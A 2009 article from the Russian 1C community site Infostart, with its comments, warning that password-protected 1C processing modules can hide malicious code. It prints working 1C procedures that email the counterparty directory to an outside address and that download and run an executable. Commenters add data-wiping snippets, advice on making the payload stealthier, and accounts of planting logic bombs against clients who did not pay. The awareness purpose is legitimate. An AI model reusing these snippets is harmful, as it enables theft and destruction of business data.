Что может скрываться в модуле обработки?

25.05.09

Администрирование - Информационная безопасность

Многие из программистов 1С Предприятие при выкладывании своих обработок (например на Инфостарт) закрывают доступ к модулю объектов паролем. Что же они там могут прятать, приведу пару примеров ( http://infostart.ru/projects/3837/ ):

Что может скрываться в модуле обработки?

Пример первый, «тырим» справочник Контрагенты :)

Процедура ТыримКонтрагентов()
АдресКуда = "sergey1c@ngs.ru";
ТД = Новый ТекстовыйДокумент;

Запрос = Новый Запрос;
Запрос.Текст =
"ВЫБРАТЬ РАЗРЕШЕННЫЕ РАЗЛИЧНЫЕ
| Контрагенты.Ссылка
|ИЗ
| Справочник.Контрагенты КАК Контрагенты
|ГДЕ
| Контрагенты.ЭтоГруппа = ЛОЖЬ";

Выборка= Запрос.Выполнить().Выбрать();

Пока Выборка.Следующий() Цикл
    ТД.ДобавитьСтроку(Выборка.Ссылка.НаименованиеПолное);
КонецЦикла;

Путь = "c:\kont.txt";

ТД.Записать(Путь);


Профиль = Новый ИнтернетПочтовыйПрофиль;
Профиль.АдресСервераSMTP = "smtp.mail.ru";
Профиль.ПортSMTP = 25;
Профиль.ПользовательSMTP = "kontrag";
Профиль.ПарольSMTP = "kontrag";
Профиль.АутентификацияSMTP = СпособSMTPАутентификации.Login;

ИнтернетПочта = Новый ИнтернетПочта;

Попытка
    ИнтернетПочта.Подключиться(Профиль);
Исключение
КонецПопытки;


ПочтовоеСообщение = Новый ИнтернетПочтовоеСообщение;
ПочтовоеСообщение.Тема ="Контрагенты";
ПочтовоеСообщение.Отправитель ="kontrag@mail.ru";
ПочтовоеСообщение.Вложения.Добавить(Путь, "Конт.txt");
ПочтовоеСообщение.Получатели.Добавить(АдресКуда);

Попытка
    ИнтернетПочта.Послать(ПочтовоеСообщение);
    ИнтернетПочта.Отключиться();
Исключение
КонецПопытки;

УдалитьФайлы(Путь);

КонецПроцедуры

В данном примере выбираются только полные наименования контрагентов.

Потом только остается проверять почту указанную в АдресКуда = "sergey1c@ngs.ru".

Пример второй, заносим на компьютер вирус

Процедура ЗаносимВирус()

 

КудаСохраняем ="c:\FarManager170.exe";

HTTP = Новый HTTPСоединение("www.farmanager.com");

HTTP.Получить("/files/FarManager170.exe", КудаСохраняем);

ЗапуститьПриложение(КудаСохраняем);

 

КонецПроцедуры

Тут вообще все просто, скачивается и запускается

P.S.

Большая просьба для всех, не примеряйте эту статью на себя.

+97 –1

См. также

Работа с бинарными файлами, форматом ASN1 и криптографией в 1С8

Информационная безопасность Программист Платформа 1С v8.3 Конфигурации 1cv8 Россия Платные (руб)

Предлагается внешняя обработка для просмотра данных в формате ASN1. Есть 2 режима: загрузка из бинарного формата и из BASE64. Реализована функция извлечения всех сертификатов, которые можно найти в ASN1-файле. В дополнении к этому продукту предлагается методическая помощь по вопросам, связанным с технической реализацией криптографии и шифрования в 1С.

2400 руб.

29.08.2016 30187 10 1

Интеграция Vault и 1С

Информационная безопасность Пароли Платформа 1С v8.3 Бесплатно (free)

Все еще храните пароли в базе? Тогда мы идем к вам! Безопасное и надежное хранение секретов. JWT авторизация. Удобный интерфейс. Демо конфигурация. Бесплатно.

30.05.2024 6846 kamisov 18

Настройка аутентификации в 1С с использованием стандарта RFC 7519 (JWT)

Информационная безопасность Программист Платформа 1С v8.3 Бесплатно (free)

Рассмотрим в статье более подробную и последовательную настройку аутентификации в 1С с использованием распространенной технологии JWT, которая пришла в программу в платформе версии 8.3.21.1302.

27.02.2024 8622 PROSTO-1C 10

Device flow аутентификация, или туда и обратно

Информационная безопасность Программист Платформа 1С v8.3 Абонемент ($m)

Интеграционные решения стали неотъемлемой частью нашей жизни. Правилом хорошего тона в современных приложениях является не давать интегратору доступ к чувствительным данным. Device flow позволяет аутентифицировать пользователя, не показывая приложению чувствительные данные (например: логин и пароль)<br> Рассмотрим Device flow аутентификацию, в приложении, на примере OpenID провайдера Yandex.

1 стартмани

27.10.2023 2608 platonov.e 1

Установка 1С:Сервера взаимодействия. Заметки на полях

Информационная безопасность Системный администратор Программист Платформа 1С v8.3 Конфигурации 1cv8 Бесплатно (free)

Нюансы установки 1С:Сервера взаимодействия в рабочем контуре

11.10.2023 5129 capitan 9

Быстрая и комплексная оценка защищенности базы и сервера

Информационная безопасность Системный администратор Платформа 1С v8.3 Конфигурации 1cv8 Россия Абонемент ($m)

Продукты на основе решений 1С уверенной поступью захватывают рынок учётных систем в стране. Широкое распространение программ всегда порождает большой интерес к ним со стороны злоумышленников, а пользователь 1С это одна из дверей в защищённый информационный контур предприятия. Обработка позволяет быстро и комплексно оценить настройки безопасности конкретной базы и возможности пользователя этой базы на сервере. Также можно оценить некоторые аспекты сетевой безопасности предприятия со стороны сервера 1С.

5 стартмани

24.04.2023 6448 21 soulner 8

Двухфакторная аутентификация в 1С через Telegram и Email

Информационная безопасность Системный администратор Программист Платформа 1С v8.3 1С:ERP Управление предприятием 2 Абонемент ($m)

1С, начиная с версии платформы 8.3.21, добавили в систему возможность двойной аутентификации. Как это работает: в пользователе информационной базы появилось свойство «Аутентификация токеном доступа» (АутентификацияТокеномДоступа во встроенном языке), если установить этот признак и осуществить ряд манипуляций на встроенном языке, то появляется возможность при аутентификации отправлять HTTP запросы, которые и реализуют этот самый второй фактор. Данное расширение позволяет организовать двухфакторную аутентификацию с помощью электронной почты или мессенджера Telegram.

2 стартмани

08.12.2022 7592 53 Silenser 12

Временная блокировка работы пользователя (Alt+L)

Информационная безопасность Пароли Платформа 1С v8.3 Управляемые формы Конфигурации 1cv8 Бесплатно (free)

Расширение для параноиков.

22.11.2022 4505 122 ixijixi 12

Комментарии

Подписаться на ответы Инфостарт бот

Свернуть все

1. bestuzhev 684 10.04.09 16:35 Сейчас в теме

Как синтаксис подсветить?

2. Поручик 4661 10.04.09 16:55 Сейчас в теме

Самим за код стрёмно, вот и прячут его за паролем.

Ответить

3. bestuzhev 684 10.04.09 17:03 Сейчас в теме

(2) А что срамиться, написал криво умные люди подскажут, в следующий раз лучше напишешь, а то так и будешь всю жизнь как попало писать :)

4. KapasMordorov 429 10.04.09 17:38 Сейчас в теме

В 1С очень уж много возможностей в платформе. Для учетной программы - т.е. в каком качестве ее в основном покупают.

5. krein 63 10.04.09 18:26 Сейчас в теме

Щас те, кто раньше об этом и не знал, начнут вставлять этот код в обработки :),
а вообще если установлен нормальный фаервол, то он предупредит о том, что 1с стучится в инет, а антивир заблокирует вирусню.

6. bestuzhev 684 10.04.09 18:38 Сейчас в теме

(5) Но у мнегих даже антивируса нет, вот в чем проблема.

7. bestuzhev 684 10.04.09 18:39 Сейчас в теме

хм, обработку с примерами видимо удалили админы... ну да ладно...

8. wirg 10.04.09 19:11 Сейчас в теме

Вот люди зачем подсказывать идеи вредителям и так мало стоящих разработок.

9. German 413 10.04.09 21:47 Сейчас в теме

Да. Один напишет ... другие с гордостью применят -

13. bestuzhev 684 10.04.09 22:14 Сейчас в теме

(9) А ты как хотел, либо работай с проверенными людьми либо код смотри. Если код не понимаешь, лучше вообще не пользоваться чужими разработками, в конце концов 1с не игрушка и потерять (испортить) из нее данные в связи с чьей-то некомпетентностью не есть good. И вообще, имхо, каждый уважающий себя программист следит за своей репутацией и она многого стоит, так как кормит его. А если ты скачал где-то непонятную обработку, и воспользовался ей, это на твой страх и риск.

46. Mickl 118 11.04.09 19:47 Сейчас в теме

(9) Кто предупрежден тот вооружен!

10. Душелов 4021 10.04.09 21:50 Сейчас в теме

А представляете, что можно во внешние компоненты запихать!!

Ответить

15. Abadonna 3969 10.04.09 22:23 Сейчас в теме

(10) А в экзюк еще проще ;)

16. Душелов 4021 10.04.09 22:27 Сейчас в теме

(15) А в активикс еще проще! Только ее на форму бросил - сразу админские пароли ушли. 1С-ку запустил - информация о контрагентах и прочим ушла.
Ну и всякие бэкдоры активировались.

17. Abadonna 3969 10.04.09 22:30 Сейчас в теме

(16) Я уж, честно говоря, и не знаю куда мне все эти пароли с контрагентами девать! Развелось видимо-невидимо, вот и шлю щас кому попало ;)

18. Душелов 4021 10.04.09 22:33 Сейчас в теме

(17) А я на диски записываю. На горбушке и савеле мои сборники продаются.

11. biv75 10.04.09 22:04 Сейчас в теме

Так Василий, ты меня пугаешь, у меня твоих компонент в разработках, что грязи

12. Душелов 4021 10.04.09 22:05 Сейчас в теме

(11) Поздно, я уже все знаю!

14. biv75 10.04.09 22:19 Сейчас в теме

(12) Коварный ты тип, суров ты на расправу )))

19. bestuzhev 684 10.04.09 22:57 Сейчас в теме

Вот, что выясняется, все тут с грешком. :)

20. Душелов 4021 10.04.09 22:59 Сейчас в теме

Почему с грешком? Это просто очередной способ заработка.
Владельца порталов базы пользователей продают для спамеров - тоже хорошо.

21. Душелов 4021 10.04.09 23:00 Сейчас в теме

(0) А во втором примере вместо "ЗапуститьПриложение(КудаСохраняем);"
Я бы посоветовал использовать Script.Shell для того, чтобы не выскакивало левых окон.

22. bestuzhev 684 10.04.09 23:06 Сейчас в теме

(21) Да бога ради это только пример :)
У меня например вообще не один вариант не проканает т.к. когда я эту статью выложил интернет себе отключил от греха по дальше. :)

23. script 128 10.04.09 23:41 Сейчас в теме

Вы оч. странные, а анти вирусы начто нужны.
С нормальным аетивирусом никакая внеш. компонента и скрытый код не помогут.
Тема открыта на показуху для зивак.

24. Душелов 4021 10.04.09 23:45 Сейчас в теме

(23) И как же антивирус поможет против от скачивания файла и его запуска?

25. anbxp 11.04.09 00:20 Сейчас в теме

(24) Нормальный антивирус тупо заблокирует всю деятельность ВК/обработки. Когда-то давно тестировал фаерволл ZoneAlarm (не антивирус, правда), так он ни одному тестеру даже запуститься не дал. Сейчас стоит NortonAntivirus2008 + Comodo. Они на пару 1С даже за обновлениями еле пропускают:)

26. Душелов 4021 11.04.09 00:50 Сейчас в теме

:))) Антивирусы ничего этого не блокируют.
Если 1С-ке разрешено лазить по 80 порту, то она спокойно скачает и запустит все.

27. anbxp 11.04.09 01:02 Сейчас в теме

Если разрешено, то она попытается скачать. А вот запустить - не получится. Блин, да так про любое приложение можно говорить. Типа, раз ie разрешено выходить в инет, то он все и запустить сможет. Разработчики антивирусов полные идиоты?

28. Душелов 4021 11.04.09 01:03 Сейчас в теме

При чем тут антивирус и запуск приложения?

34. artbear 1565 11.04.09 06:27 Сейчас в теме

(28) 1. Ты не прав, антивирь не даст запуститься приложению, которое содержит вирус, и неважно, откуда и как его запускаем.
2. Вот закачка файлов и доступ к почте, сайтам и т.д уже другое дело.
Большинство антивирусов не слишком блокируют эти возможности, потому что это не их основная задача, а задача файерволлов и т.д.

ИМХО по опыту на большинстве машин стоят обычные антивири с минимальной блокировкой интернет-трафика. Поэтому вариант 1 и ему подобные с отправкой важной инфы по почте может пройти наверняка.

А вариант 2 практически не жизнеспособен :)

36. bestuzhev 684 11.04.09 06:48 Сейчас в теме

(34) Вирус это как вариант, можно и другой вредоносный код, который антивирус не распознает.

>ИМХО по опыту на большинстве машин стоят обычные антивири с минимальной >блокировкой интернет-трафика
Вот это я и пытаюсь до все донести.+

37. Abadonna 3969 11.04.09 07:29 Сейчас в теме

(34) Фильм "Антикиллер"
- Он же не чувствует боли.
- У меня почувствует!
В НАШЕЙ сетке никогда ничего не запустится, не полезет по портам и т.д.
Политика фашизма применима полностью :))))

29. Душелов 4021 11.04.09 01:04 Сейчас в теме

OLE-соединения тоже блокируются "антивирусом"?

30. Душелов 4021 11.04.09 01:05 Сейчас в теме

Вообщем разговор слепого с глухим :)

31. anbxp 11.04.09 01:09 Сейчас в теме

(30) Так ответить проще всего. Все соединения проверяются антивирусом. И все запуски приложений тем более. Если он нормальный. Хотя, действительно, разговор пустой.

32. Душелов 4021 11.04.09 01:14 Сейчас в теме

Да, я сдался. Мне уже возразить нечего.
Нормальный антивирус заблокирует 1С-ку.

33. anbxp 11.04.09 01:19 Сейчас в теме

Советую на чистую ОС установить каспера последнего, и посмотреть - как это происходит:) Все, спокойной ночи, до завтра:)

35. bestuzhev 684 11.04.09 06:46 Сейчас в теме

Что ты прикопались к этим вирусам, я думаю что дороже потерять справочник контрагенты с контактами чем комп вирусом заразить. Тем более, как я уже говорил выше, не у всех стоят антивирусы и фаерволы, по себе людей не судят. Я видел очень много компов без антивирусов и фаерволов но с 1С. Многим жалко 1000 рублей на антивирус, а ломаный поставить ума не хватает.

38. dushich 34 11.04.09 10:58 Сейчас в теме

Ну, ребят. С таким же успехом можно и блокнот обвинить в опасности. Я вот скрипты в блокнотике редактирую :)
Бред. Люди закрывают модули ради выгоды. Или как сказал bestuzhev чтоб не срамится.
А использовать для таких целей каверзных 1С, конечно можно, но почти не имеет смысла.
1. Если кто-то узнает, то это полный провал в карьере.
2. А если используешь чужое, то скорее всего из интернета. А кому может понадобится список контрагентов, к примеру моего маленького городка?
Бред.

39. luns 11.04.09 11:43 Сейчас в теме

Дарю от себя кусочек зловредного кода:

Код
Для Каждого Регистр Из Метаданные.РегистрыСведений Цикл Набор = РегистрыСведений[Регистр.Имя].СоздатьНаборЗаписей(); Набор.Записать(); КонецЦикла; Показать полностью

Код

Для Каждого Регистр Из Метаданные.РегистрыСведений Цикл
      Набор = РегистрыСведений[Регистр.Имя].СоздатьНаборЗаписей();
      Набор.Записать();
   КонецЦикла;

Показать полностью

69. mc_syma_v@mail.ru 07.05.09 22:04 Сейчас в теме

(39) просто жесть

40. luns 11.04.09 11:44 Сейчас в теме

Антивирусы и фаерволы не спасут... тока бэкап.

41. Evg-Lylyk 4894 11.04.09 15:05 Сейчас в теме

Зря вы тык эту фигню пишите найдутся горе умельцы от которых хто нить да пострадает.
Завтра 1С выпустят защиту от вредоностного кода :)))))
Прикольно наверно сидишь тут бамс выскакивает сообщение пользователь "Х" выполняет подозрительное действие через обработку "Ei.epf" блокировать?

42. bestuzhev 684 11.04.09 17:56 Сейчас в теме

(41) Вообще-то надо просто запретить выполнять обработки кому попало, а нужные подключить как внешние или на кройняк в конфу встроить.

48. Evg-Lylyk 4894 12.04.09 12:28 Сейчас в теме

(42) да все можно, но это всегда работа и неудобства себе и другим.
(47) это пиар. Вспомнил самую "системную" обработку оказался EI. :)

47. German 413 11.04.09 20:09 Сейчас в теме

(41) нормально!!!. вот и Ei не за что досталось :(

53. maljaev 789 16.04.09 00:26 Сейчас в теме

(41) Документ "Расходная накладная" пытается создать записи по регистру "Партии товаров". Запретить? Разрешить? Игнорировать?
:)

43. CheBurator 2693 11.04.09 18:34 Сейчас в теме

Ребята, о чем вы говорите... народ не читает ридми даже... хотя в первых строках описания на странице разработки жирным шрифтом написано: СПЕЦИАЛЬНО ДЛЯ НЕКОТОРЫХ "ЛЕНТЯЕВ", КОТОРЫХ ЛОМАЕТ ЧИТАТЬ README.TXT - ПИШУ КРУПНЫМИ ЖИРНЫМИ БУКВАМИ В НАЧАЛЕ ОПИСАНИЯ: ЧИТАЙТЕ README.TXT C ПЕРВОЙ СТРОКИ до ПОСЛЕДНЕЙ - ТАМ ВСЕ НАПИСАНО...

44. bestuzhev 684 11.04.09 18:46 Сейчас в теме

(43) Дело говоришь. Вообще все люди лентяи, все хотят упростить свою жизнь. Как говориться Лень - двигатель прогресса.

45. Mickl 118 11.04.09 19:45 Сейчас в теме

Да, Сергей. А я даже как то и не думал об этом
Спасибо "+"

49. drkhaired 51 14.04.09 12:56 Сейчас в теме

Я примерно предполагал, что такое возможно.. Это еще фигня, вот если наименование номенклатуры похерить, итд.... Поэтому использование чужих запароленых разработок могут привести в такого рода неприятностям, понятно, что все это поправимо, но зачем лишняя головная боль.

50. rebuzx 164 15.04.09 07:41 Сейчас в теме

Спокойствие спасёт не антивирус и файрвол!
Бэкап - ваше спасение! У меня бекапиться 2 раза в сутки, скриптами через планироващик заданий, автопилотом всех нагло выкидывает и архивирует базы. Все знают что во столько то будет архивация. Базы на Скуле. Так что проблемы все решаются в течении 5 минут (тьфу тьфу пока проносило мимо).
А антивири нужны для большего спокойствия от внеших атак зловредных программ. У меня 1С стоит в фильтрах антивируса и он её даже не сканирует как и 1С базы на SQL.

51. maljaev 789 15.04.09 13:41 Сейчас в теме

1) БЭКАП МОЖЕТ НЕ СПАСТИ! Если очень осторожно и потихоньку портить данные в базе (седня там одну циферку подправил, завтра там контрагента поменял, послезавтра задолженность с одного сотрудника на другого перевел и т.д.), то когда обнаружатся все эти факты и до бухгалтеров наконец дойдет что всё это неспроста, и обнаружат откуда ноги дойдут - то пройдет столько времени, что восстанавливать базу из бэкапа уже смысла не будет. Только вручную сравнивать все бэкапы с текущей базой и смотреть что, где, как, кем и когда поменялось - а это процесс сцуко очень долгий и геморный.

2) Кроме явных вредных инструкций в коде 1С можно засунуть хоть десяток вирусняков в сам ERT-файл и даже в MD-файл (я, к примеру, теперь умею всё это засовывать в картинку в диалоге формы с минусовыми координатами, так что ее не видно). В данном случае эффект может быть фатальным для базы, компа, сетки. Ну и вы сами знаете, что есть вирусы, которые не находит ни один антивирус; есть вирусы которые блокируют антивирусы, файрваллы и прочие.

3) Своровать данные можно и в обход файрвалла, даже если самой 1С доступ в инет запрещен. Достаточно просто перехватить создание/отправку любого письма, внедрив в него интересующие данные и подменив (добавив) адрес получателя.

59. anbxp 16.04.09 14:32 Сейчас в теме

(51) Заверните мне таких вирусов штук 10, пожалуйста:) И дайте пример кода подмены тела письма из 1С. Только, сначала сами этот код при работающем фаерволе проверьте:)

60. maljaev 789 16.04.09 15:48 Сейчас в теме

(59) artbear правильно сказал - то что я знаю и умею это делать, еще не значит что я буду это делать. Для меня авторитет и здоровье дороже. При скачивании чужой разработки я тоже в первую очередь смотрю кто автор - некоторым я доверяю больше чем себе. :)

61. anbxp 16.04.09 16:12 Сейчас в теме

(60) Зачемятельная отговорка:)

52. MrDen 435 15.04.09 20:42 Сейчас в теме

ХМ, да в принципе то можно многое сделать :-) тут уж зависит от того сам ты это делать будеш или защищаться от кого :-)
Если сам, то мне кажется неэтично, в УК разъянено на сколько, ну а степень защищенности прямо пропорциональна уровню знаний и умению быть "неэтичным".
Тут как в жизни 2 пути либо предохраняешся либо нет :-)

54. maljaev 789 16.04.09 00:41 Сейчас в теме

Кроме того, опасность может представлять почти каждый элемент диалога. К примеру, если формулу кнопки "Сформировать" (имеющей изначально формулу "Сформировать();") изменить на нижеприведенный код, то последствия будут фатальными:

Спр=СоздатьОбъект("Справочник.Контрагенты"); Спр.ПорядокКодов(); Спр.ВыбратьЭлементы(); Пока Спр.ПолучитьЭлемент()=1 Цикл Спр.Наименование=""; Спр.Записать(); КонецЦикла;

Тут единственное требование, чтобы в модуле была определена переменная "Спр". И анализ кода абсолютно не даст вам представления о том, что на самом деле делает обработка. Необходим также анализ всех элементов диалога. В общем, застраховаться ото всех возможных ситуаций практически невозможно. Единственно возможная защита - брать обновления и обработки только из надежных проверенных источников, например с дисков ИТС. :)

55. larisab 160 16.04.09 08:38 Сейчас в теме

После скачивания какой нибудь обработки, я смотрю код (привычка), если закрыт, сразу удаляю - ну не надо мне такого. Потому что 90% обработок не подходят для казахстанских конфигураций. Спасибо за предупреждение, буду бдительнее. Но вот вопрос, как теперь это скажется на продаже через ИС программ и обработок, они то в основном все закрытые так или иначе, доверие пользователей то упадет?

56. PVG_73 17 16.04.09 12:35 Сейчас в теме

А зачем что-то скачивать....
все приносится с собой в макете....
не просто а очень просто.... :(

Когда я с этим столкнулси... то был неприятно удивлен...

Зато теперь предупрежден, значит вооружен.... :)

57. artbear 1565 16.04.09 14:05 Сейчас в теме

Лично я при использовании закрытого кода смотрю еще на личность разработчика. Если он лично мне известен или известны его работы, и я вижу их профессиональность, я с намного большим доверием отношусь к его выложенной, но закрытой работе.

ЗЫ ну и расшифровку зашифрованных модулей 8 еще никто не отменял на самый крайний случай - честно говоря, мне еще ни разу не пригодилось.

58. artbear 1565 16.04.09 14:07 Сейчас в теме

(57) По себе знаю - профессионал не станет всякой фигней типов вирусов, удаления данных и т.д. заниматься :)
А тем более выкладывать в общий доступ подобные вещи - авторитет можно потерять навсегда.

62. Fuego 463 17.04.09 23:26 Сейчас в теме

Мне чаще встречались писаки, которые амбициозно прятали свой код за паролем. Мол, обязательно же сопрут мой драгоценный код!.. А в разрезе - код этот полнейшая дрянь. А насчёт всяких фишек с воровством информации чрез нет - просто нужно запретить 1С-ке доступ в инет. Например устроить запуск программы от ограниченной политиками учётной записи. Я сам над этим не заморачивался. Чужие компоненты и активексы не использую, обработкам всегда сперва смотрю в кишки, а потом на морду. Да и на морду эту вообще-то редко смотрю :)

74. h00k 51 28.06.09 00:53 Сейчас в теме

(62) Не обязательно закрывать паролем, я например, регулярно использую "функционал поставки без исходных кодов". И связано это обычно не с "ценностью" кода, а установленными в обработках ограничениями, что-то вроде демо версии. При определенной договоренности с клиентом, это так же может быть защита кода от всяких "умельцев", коих в области 1С великое множество, а клиент оплативший обработку опасается "утечки" модуля к конкурентам (пример из жизни: привязка обработки загрузки деталей в 1С из ETKA 7 к конфигурации заказчика). Профессионала это не остановит, благодаря самой концепции 1С как "открытой" платформы - даже защита на донглах не состоятельна (имеется в виду сама возможность снятия защиты, а не коммерческая обоснованность подобных действий), зато очередное "юнное дарование" скорее всего потерпит фиаско...

63. TIG-PROGRAMMIST 49 19.04.09 03:08 Сейчас в теме

Ломать не строить душа не болит, а стеклянный х-й дуракам не на долго, пусть пишут пока пишется, но если вычислим куда уходит информация вот туда мы и наспамим этому горе шпиону... пущай пару миллионов писем с фуфлом разгребает.....

64. TIG-PROGRAMMIST 49 19.04.09 03:12 Сейчас в теме

Короче надо сделать раздел нечистых обработок и их авторов и со времен этого хлама наберется как записей в базах антивирусных программ, а чуть позже 1С овцы напишут антивирус под 1С и будет нам счастье а им дополнительная прибыль...

65. TIG-PROGRAMMIST 49 19.04.09 03:15 Сейчас в теме

И вообще сцуко стрелять надо таких лжепрограммистов, не на вижу разрушителей, нет бы написать путнее, а нет нате вам говно в салате... УРОДЫ КТО ПИШЕТ ПОДЛЫЙ КОД!!!! УЗНАЮ БУДУ СТРОГО СТРЕЛЯТЬ В ВИСОЧНУЮ ОБЛАСТЬ.

66. Abadonna 3969 19.04.09 04:16 Сейчас в теме

(65)> УЗНАЮ БУДУ СТРОГО СТРЕЛЯТЬ В ВИСОЧНУЮ ОБЛАСТЬ.
Эк разошелся :))) А есть из чего стрелять? ;)

75. h00k 51 28.06.09 02:56 Сейчас в теме

(65) Ну-ну, стрелятель... я лично знаю несколько организаций где в результате выполнения моих обработок была "надежно убита" измененная конфигурация, правда я не портил данные, всегда оставлял им возможность вернуться к типовому функционалу. И связано сие не с детской тягой к разрушению, а с "не чистоплотностью" некоторых заказчиков, "забывавших" что кроме предоплаты еще есть окончательный рассчет, либо считавших, что "любой 1С-ник" и тарелке супа должен быть рад -"вас же как грязи, мне любой такое за 3 рубля напишет...".
Потом выясняется что не любой, но с заказчиком, у которого ТАКОЕ ко мне и моим коллегам отношение, я работать уже не буду.

77. TIG-PROGRAMMIST 49 08.08.09 02:42 Сейчас в теме

(65) А вот не чистоплотным мыло в обработку и я подсовываю, опа не оплатили и можно начинать мылить попы, а как же здесь вам ни тут и за тарелку супа писать не будем, т.к. если бы все было так просто "русский бейсик" по мимо всего мозг должен иметь хотя бы 50% знаний бухгалтерского учета для корректной доработки того или оного объекта, а то было один чуюдик стырил мои нароботки для одной фирмы и за бабулесы внедрил их в другую конфигурацию и управился, а оно опачки опатуленьки и не работает хорошо что не ушатал базу и то ладно так что желающих поиметь программеров 1С просьба не обольщаться, программеров то дофига а ИСТЕЕНО ШАРЮЩИК ЕДИНИЦЫ.
З.Ы.
h00k - так что правильно ты их надо знать себе цены если ты спец. А просто хацкерам которые пишут вреднасти все равно стрелять буду.

67. vde69 925 21.04.09 15:51 Сейчас в теме

Вообще было-бы полезно запостить фамилии и паспортные данные авторов сиих опусов.

зы
к слову сказать я, тоже делал довольно сомнительную шнягу, авторун на флеху которая эмитировала окно выбора баз 1с, при выборе базы - сливала все на флеху и паралельно запускала 1с (ни окон, ни процесов ее небыло видно), делал для ревизии биг босом своих филиалов на предмет "левых баз".

73. kiruha 388 09.06.09 17:13 Сейчас в теме

(67) А чего искать далеко...
Встречал 2 раза. Одна обработка была с CDO.

68. sound 536 22.04.09 00:19 Сейчас в теме

Ну зачем же так с фаром а?, прямо в вирусы его? Однако рушатся основы мироздания! Ничего против total не имею. О, вечные споры! Ой что это я? :)

70. O-Planet 6452 07.05.09 23:21 Сейчас в теме

(68) Far и есть вирус

71. artbear 1565 08.05.09 07:18 Сейчас в теме

(70) Олег, не пойму, есть у тебя смайлик во фразе или нету :)

72. sound 536 09.05.09 19:51 Сейчас в теме

мдее...

76. h00k 51 28.06.09 03:04 Сейчас в теме

Хотя на столько явные "закладки" я никогда не оставлял. Обычно, для 7.7, это была какая нибудь часто используемая кнопка, а восьмерка - просто рай для экспериментаторов :)

78. TIG-PROGRAMMIST 49 08.08.09 02:44 Сейчас в теме

77 адресавал 75-76, ошибся простите засранца..

79. Lizi60 25.01.12 14:56 Сейчас в теме

Спасибо огромное за предупреждение! Только что скачала внешнюю печатную форму М-11 к операции, введённой вручную. Потратила единичку на это безнадёжное мероприятие.... А там пароль на модуль объекта...

80. ixijixi 1975 09.08.12 16:06 Сейчас в теме

Бугага! Я даже на думал о таком, спасибо за предупреждение!

81. iov 407 25.10.12 16:27 Сейчас в теме

(80) Щас конечно сделаю неприятно но статья - 25.05.2009 14:15 за это время можно стырить вернуть- потом еще раз стырить много-много раз... И как любой уважающий себя программист - вы должны иметь не клиническую паранойю и таблетки от неё :) ... А вообще любая закрытая обработка даже за деньги - есть черный ящик и НИКТО не гарантирует что там такого нет.

83. AlexanderKai 23.04.15 09:49 Сейчас в теме

(81) iov,
Да вообще никто и ничего не гарантирует. Есть Windows - закрытый код, никто не гарантирует, что нет бэкдоров. Есть Linux - никто не гарантирует, что нет уязвимостей(тех же бэкдоров).

82. ivanov_alex 66 26.10.12 09:31 Сейчас в теме

да уж...
для этих целей использую снималку паролей, благо они есть везде в свободном доступе
а разработки закриптованные и использующие ВК, тем более самописные стараюсь не пользовать

Оставьте свое сообщение

E-mail:

Автор:

Сергей Бестужев (bestuzhev)

Рейтинг: 684

Для получения уведомлений о новых публикациях автора подключите телеграм бот: Инфостарт бот

Публикация:

№ 19610

Создание 10.04.09 16:31

Обновление 25.05.09 14:15

Статистика:

Просмотры 17516

Загрузки 0

Рейтинг 96

Комментарии 84

Характеристики:

Код открыт Не указано

Рубрики Информационная безопасность

Кому Программист

Тип файла Нет файла

Платформа Платформа 1С v8.3

Конфигурация Конфигурации 1cv8

Операционная система Не имеет значения

Страна Россия

Отрасль Не имеет значения

Налоги Не имеет значения

Вид учета Не имеет значения

Доступ к файлу Бесплатно (free)